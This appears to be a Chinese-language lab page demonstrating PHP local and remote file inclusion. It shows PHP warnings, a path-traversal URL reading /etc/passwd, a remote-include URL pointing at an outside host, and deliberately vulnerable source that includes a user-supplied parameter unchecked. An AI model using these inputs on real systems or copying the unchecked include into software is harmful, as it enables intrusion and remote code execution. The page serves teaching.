文件包含演示-本地文件包含


Warning: include(): open_basedir restriction in effect. File(/etc/passwd) is not within the allowed path(s): (/www/wwwroot/upload.nanhack.com/:/tmp/) in /home/wwwroot/upload.nanhack.com/include/index.php on line 39

Warning: include(/etc/passwd): failed to open stream: Operation not permitted in /home/wwwroot/upload.nanhack.com/include/index.php on line 39

Warning: include(): Failed opening '../../../../etc/passwd' for inclusion (include_path='.:/www/server/php/70/lib/php') in /home/wwwroot/upload.nanhack.com/include/index.php on line 39

从PHP5.2开始allow_url_include就默认为Off了,而allow_url_fopen一直是On的。
远程文件包含,需要配置allow_url_include,allow_url_fopen为on

http://upload.nanhack.com/include/index.php?page=http://www.hacker.wang/php.txt

包含ect/passwd

http://upload.nanhack.com/include/index.php?page=../../../../etc/passwd

# 程序源码如下:
<?php if(isset($_GET['page'])){
$path = $_GET['page'];
    include $path;
}else{
    include "home.php";
}
?>

Warning: require(.footer.php): failed to open stream: No such file or directory in /home/wwwroot/upload.nanhack.com/include/index.php on line 78

Fatal error: require(): Failed opening required '.footer.php' (include_path='.:/www/server/php/70/lib/php') in /home/wwwroot/upload.nanhack.com/include/index.php on line 78